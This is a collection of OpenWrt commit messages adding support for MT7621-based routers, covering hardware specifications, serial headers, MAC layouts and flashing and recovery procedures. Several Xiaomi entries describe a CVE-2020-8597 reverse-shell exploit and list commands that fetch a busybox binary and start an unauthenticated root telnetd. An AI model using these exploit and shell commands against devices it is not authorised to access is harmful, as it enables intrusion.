This submission relied heavily on the work of Linksys EA7300 v1/ v2.
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: 128M DDR3-1600
* Flash: 128M NAND
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7613BE (2.4 GHz & 5 GHz)
* Antennae: 2 internal fixed in the casing and 2 on the PCB
* LEDs: Blue (x4 Ethernet)
Blue+Orange (x2 Power + WPS and Internet)
* Buttons: Reset (x1)
WPS (x1)
Installation:
Flash factory image through GUI.
This device has 2 partitions for the firmware called firmware and
alt_firmware. To successfully flash and boot the device, the device
should have been running from alt_firmware partition. To get the device
booted through alt_firmware partition, download the OEM firmware from
Linksys website and upgrade the firmware from web GUI. Once this is done,
flash the OpenWrt Factory firmware from web GUI.
Reverting to factory firmware:
1. Boot to 'alt_firmware'(where stock firmware resides) by doing one of
the following:
Press the "wps" button as soon as power LED turns on when booting.
(OR) Hard-reset the router consecutively three times to force it to
boot from 'alt_firmware'.
2. To remove any traces of OpenWRT from your router simply flash the OEM
image at this point.
Signed-off-by: Aashish Kulkarni <aashishkul@gmail.com>
[fix hanging indents and wrap to 74 characters per line,
add kmod-mt7663-firmware-sta package for 5GHz STA mode to work,
remove sysupgrade.bin and concatenate IMAGES instead in mt7621.mk,
set default-state "on" for power LED]
Signed-off-by: Sannihith Kinnera <digislayer@protonmail.com>
[move check-size before append-metadata, remove trailing whitespace]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Tested-by: Sannihith Kinnera <digislayer@protonmail.com>
(cherry picked from commit 251c995cbb)
The ZyXEL NR7101 is an 802.3at PoE powered 5G outdoor (IP68) CPE
with integrated directional 5G/LTE antennas.
Specifications:
- SoC: MediaTek MT7621AT
- RAM: 256 MB
- Flash: 128 MB MB NAND (MX30LF1G18AC)
- WiFi: MediaTek MT7603E
- Switch: 1 LAN port (Gigabiti)
- 5G/LTE: Quectel RG502Q-EA connected by USB3 to SoC
- SIM: 2 micro-SIM slots under transparent cover
- Buttons: Reset, WLAN under same cover
- LEDs: Multicolour green/red/yellow under same cover (visible)
- Power: 802.3at PoE via LAN port
The device is built as an outdoor ethernet to 5G/LTE bridge or
router. The Wifi interface is intended for installation and/or
temporary management purposes only.
UART Serial:
57600N1
Located on populated 5 pin header J5:
[o] GND
[ ] key - no pin
[o] RX
[o] TX
[o] 3.3V Vcc
Remove the SIM/button/LED cover, the WLAN button and 12 screws
holding the back plate and antenna cover together. The GPS antenna
is fixed to the cover, so be careful with the cable. Remove 4
screws fixing the antenna board to the main board, again being
careful with the cables.
A bluetooth TTL adapter is recommended for permanent console
access, to keep the router water and dustproof. The 3.3V pin is
able to power such an adapter.
MAC addresses:
OpenWrt OEM Address Found as
lan eth2 08:26:97:*:*:BC Factory 0xe000 (hex), label
wlan0 ra0 08:26:97:*:*:BD Factory 0x4 (hex)
wwan0 usb0 random
WARNING!!
ISP managed firmware might at any time update itself to a version
where all known workarounds have been disabled. Never boot an ISP
managed firmware with a SIM in any of the slots if you intend to use
the router with OpenWrt. The bootloader lock can only be disabled with
root access to running firmware. The flash chip is physically
inaccessible without soldering.
Installation from OEM web GUI:
- Log in as "supervisor" on https://172.17.1.1/
- Upload OpenWrt initramfs-recovery.bin image on the
Maintenance -> Firmware page
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Installation from OEM ssh:
- Log in as "root" on 172.17.1.1 port 22022
- scp OpenWrt initramfs-recovery.bin image to 172.17.1.1:/tmp
- Prepare bootloader config by running:
nvram setro uboot DebugFlag 0x1
nvram setro uboot CheckBypass 0
nvram commit
- Run "mtd_write -w write initramfs-recovery.bin Kernel" and reboot
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- (optional) Copy OpenWrt to the recovery partition. See below
- Sysupgrade to the OpenWrt sysupgrade image and reboot
Copying OpenWrt to the recovery partition:
- Verify that you are running a working OpenWrt recovery image
from flash
- ssh to root@192.168.1.1 and run:
fw_setenv CheckBypass 0
mtd -r erase Kernel2
- Wait while the bootloader mirrors Image1 to Image2
NOTE: This should only be done after successfully booting the OpenWrt
recovery image from the primary partition during installation. Do
not do this after having sysupgraded OpenWrt! Reinstalling the
recovery image on normal upgrades is not required or recommended.
Installation from Z-Loader:
- Halt boot by pressing Escape on console
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Type "ATNR 1,initramfs-recovery.bin" at the "ZLB>" prompt
- Wait for OpenWrt to boot and ssh to root@192.168.1.1
- Sysupgrade to the OpenWrt sysupgrade image
NOTE: ATNR will write the recovery image to both primary and recovery
partitions in one go.
Booting from RAM:
- Halt boot by pressing Escape on console
- Type "ATGU" at the "ZLB>" prompt to enter the U-Boot menu
- Press "4" to select "4: Entr boot command line interface."
- Set up a tftp server to serve the OpenWrt initramfs-recovery.bin
image at 10.10.10.3
- Load it using "tftpboot 0x88000000 initramfs-recovery.bin"
- Boot with "bootm 0x8800017C" to skip the 380 (0x17C) bytes ZyXEL
header
This method can also be used to RAM boot OEM firmware. The warning
regarding OEM applies! Never boot an unknown OEM firmware, or any OEM
firmware with a SIM in any slot.
NOTE: U-Boot configuration is incomplete (on some devices?). You may
have to configure a working mac address before running tftp using
"setenv eth0addr <mac>"
Unlocking the bootloader:
If you are unebale to halt boot, then the bootloader is locked.
The OEM firmware locks the bootloader on every boot by setting
DebugFlag to 0. Setting it to 1 is therefore only temporary
when OEM firmware is installed.
- Run "nvram setro uboot DebugFlag 0x1; nvram commit" in OEM firmware
- Run "fw_setenv DebugFlag 0x1" in OpenWrt
NOTE:
OpenWrt does this automatically on first boot if necessary
NOTE2:
Setting the flag to 0x1 avoids the reset to 0 in known OEM
versions, but this might change.
WARNING:
Writing anything to flash while the bootloader is locked is
considered extremely risky. Errors might cause a permanent
brick!
Enabling management access from LAN:
Temporary workaround to allow installing OpenWrt if OEM firmware
has disabled LAN management:
- Connect to console
- Log in as "root"
- Run "iptables -I INPUT -i br0 -j ACCEPT"
Notes on the OEM/bootloader dual partition scheme
The dual partition scheme on this device uses Image2 as a recovery
image only. The device will always boot from Image1, but the
bootloader might copy Image2 to Image1 under specific conditions. This
scheme prevents repurposing of the space occupied by Image2 in any
useful way.
Validation of primary and recovery images is controlled by the
variables CheckBypass, Image1Stable, and Image1Try.
The bootloader sets CheckBypass to 0 and reboots if Image1 fails
validation.
If CheckBypass is 0 and Image1 is invalid then Image2 is copied to
Image1.
If CheckBypass is 0 and Image2 is invalid, then Image1 is copied to
Image2.
If CheckBypass is 1 then all tests are skipped and Image1 is booted
unconditionally. CheckBypass is set to 1 after each successful
validation of Image1.
Image1Try is incremented if Image1Stable is 0, and Image2 is copied to
Image1 if Image1Try is 3 or larger. But the bootloader only tests
Image1Try if CheckBypass is 0, which is impossible unless the booted
image sets it to 0 before failing.
The system is therefore not resilient against runtime errors like
failure to mount the rootfs, unless the kernel image sets CheckBypass
to 0 before failing. This is not yet implemented in OpenWrt.
Setting Image1Stable to 1 prevents the bootloader from updating
Image1Try on every boot, saving unnecessary writes to the environment
partition.
Keeping an OpenWrt initramfs recovery as Image2 is recommended
primarily to avoid unwanted OEM firmware boots on failure. Ref the
warning above. It enables console-less recovery in case of some
failures to boot from Image1.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
Tested-by: Bjørn Mork <bjorn@mork.no>
(cherry picked from commit 2449a63208)
shellcheck recommends || and && over "-a" and "-o" because the
latter are not well defined.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Xiaomi Mi Router 4 is the same as Xiaomi Mi Router 3G, except for
the RAM (256Mib→128Mib), LEDs and gpio (MiNet button).
Specifications:
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: MediaTek MT7621A (880 MHz, 4 cores)
FLA1: 128 MiB (ESMT F59L1G81MA)
RAM1: 128 MiB (ESMT M15T1G1664A)
WI1 chip1: MediaTek MT7603EN
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: U.FL
WI2 chip1: MediaTek MT7612EN
WI2 802dot11 protocols: an+ac
WI2 MIMO config: 2x2:2
WI2 antenna connector: U.FL
ETH chip1: MediaTek MT7621A
Switch: MediaTek MT7621A
UART Serial
[o] TX
[o] GND
[o] RX
[ ] VCC - Do not connect it
MAC addresses as verified by OEM firmware:
use address source
LAN *:c2 factory 0xe000 (label)
WAN *:c3 factory 0xe006
2g *:c4 factory 0x0000
5g *:c5 factory 0x8000
Flashing instructions:
1.Create a simple http server (nginx etc)
2.set uart enable
To enable writing to the console, you must reset to factory settings
Then you see uboot boot, press the keyboard 4 button (enter uboot command line)
If it is not successful, repeat the above operation of restoring the factory settings.
After entering the uboot command line, type:
setenv uart_en 1
saveenv
boot
3.use shell in uart
cd /tmp
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin
wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin kernel1
mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin rootfs0
nvram set flag_try_sys1_failed=1
nvram commit
reboot
4.login to the router http://192.168.1.1/
Installation via Software exploit
Find the instructions in the https://github.com/acecilia/OpenWRTInvasion
Signed-off-by: Dmytro Oz <sequentiality@gmail.com>
[commit message facelift, rebase onto shared DTSI/common device
definition, bump uboot-envtools]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Commit "initramfs: switch to tmpfs to fix ujail" switched initramfs to
now use tmpfs, it causes $(rootfs_type) to now return tmpfs when
running initramfs image instead of being empty.
This broke initramfs detection which is required so that when installing
on MikroTik devices firmware partition would first get erased fully
before writing.
So, lets test for $(rootfs_type) returning "tmpfs" instead.
Fixes: 7fd3c68 ("initramfs: switch to tmpfs to fix ujail)
Signed-off-by: Robert Marko <robimarko@gmail.com>
This aligns the device/image names of the older Xiaomi Mi Router
devices with their "friendly" model and DEVICE_MODEL properties.
This also reintroduces consistency with the newer devices already
following that scheme.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-2640 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (blue/orange), Internet (blue/orange), WiFi 2.4G (blue),
WiFi 5G (blue), USB 3.0 (blue), USB 2.0 (blue)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: James McGuire <jamesm51@gmail.com>
[fix device definition title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This submission relied heavily on the work of
Santiago Rodriguez-Papa <contact at rodsan.dev>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Winbond W632GG6MB-12 (256M DDR3-1600)
* Flash: Winbond W29N01HVSINA (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
This patch adds support for D-Link DIR-2660 A1.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 2.0, 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white), USB 2.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:a7 (label)
wan factory 0xe006 *:aa
2.4 factory 0xe000 +1 *:a8
5.0 factory 0xe000 +2 *:a9
Seems like vendor didn't replace the dummy entries in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[rebase onto already merged DIR-1960 A1, add MAC addresses to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for the MikroTik RouterBOARD 760iGS router.
It is similar to the already supported RouterBOARD 750Gr3.
The 760iGS device features an added SFP cage, and passive
PoE out on port 5 compared to the RB750Gr3.
https://mikrotik.com/product/hex_s
Specifications:
- SoC: MediaTek MT7621A
- CPU: 880MHz
- Flash: 16 MB
- RAM: 256 MB
- Ethernet: 5x 10/100/1000 Mbps
- SFP cage
- USB port
- microSD slot
Unsupported:
- Beeper (requires PWM driver)
- ZT2046Q (ADS7846 compatible) on SPI as slave 1 (CS1)
The linux driver requires an interrupt, and pendown GPIO
These are unknown, and not needed with the touchscreen
only used for temperature and voltage monitoring.
ads7846 hwmon:
temp0 is degrees Celsius
temp1 is voltage * 32
GPIOs:
- 07: input passive PoE out (lan5) compatible (Mikrotik) device connected
- 17: output passive PoE out (lan5) switch
Installation through RouterBoot follows the usual MikroTik method
https://openwrt.org/toh/mikrotik/common
To boot to intramfs image in RAM:
1. Setup TFTP server to serve intramfs image.
2. Plug Ethernet cable into WAN port.
3. Unplug power, hold reset button and plug power in.
Wait (~25 seconds) for beep and then release reset button.
The SFP LED will be lit in RouterBoot, but will not be lit in OpenWRT.
4. Wait for a minute. Router should be running OpenWrt,
check by plugging in to port 2-5 and going to 192.168.1.1.
To install OpenWrt to flash:
1. Follow steps above to boot intramfs image in RAM.
2. Flash the sysupgrade.bin image with web interface or sysupgrade.
3. Once the router reboots you will be running OpenWrt from flash.
OEM firmware differences:
- RouterOS assigns a different MAC address for each port
- The first address (E01 on the sticker) is used for wan (ether1 in OEM).
- The next address is used for lan2.
- The last address (E06 on the sticker) is used for sfp.
[Initial port work, shared dtsi]
Signed-off-by: Vince Grassia <vincenzo.grassia@zionark.com>
[SFP support and GPIO identification]
Signed-off-by: Luka Logar <luka.logar@iname.com>
[Misc. fixes and submission]
Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au>
[rebase, drop uart3 from state_default on 750gr3, minor commit
title/message facelift]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This patch adds support for D-Link DIR-1960 A1. Given the similarity with
the DIR-1760/2660 A1, this patch also introduces a common DTSI which can
be shared with these devices, with support to be added in future commits.
Specifications:
* Board: AP-MTKH7-0002
* SoC: MediaTek MT7621AT
* RAM: 256 MB (DDR3)
* Flash: 128 MB (NAND)
* WiFi: MediaTek MT7615N (x2)
* Switch: 1 WAN, 4 LAN (Gigabit)
* Ports: 1 USB 3.0
* Buttons: Reset, WPS
* LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white),
WiFi 5G (white), USB 3.0 (white)
Notes:
* WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips
Installation:
* D-Link Recovery GUI: power down the router, press and hold the reset
button, then re-plug it. Keep the reset button pressed until the power
LED starts flashing orange, manually assign a static IP address under
the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1
* Some modern browsers may have problems flashing via the Recovery GUI,
if that occurs consider uploading the firmware through cURL:
curl -v -i -F "firmware=@file.bin" 192.168.0.1
MAC addresses:
lan factory 0xe000 *:EB (label)
wan factory 0xe006 *:EE
2.4 factory 0xe000 +1 *:EC
5.0 factory 0xe000 +2 *:ED
Seems like vendor didn't replace the dummy entrys in the calibration data.
Signed-off-by: Josh Bendavid <joshbendavid@gmail.com>
[fix whitespace issues, create patch to merge DIR-1960 first, move
special WiFi MAC settings to DTS, extend commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Installation:
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXELs zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not avaible for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
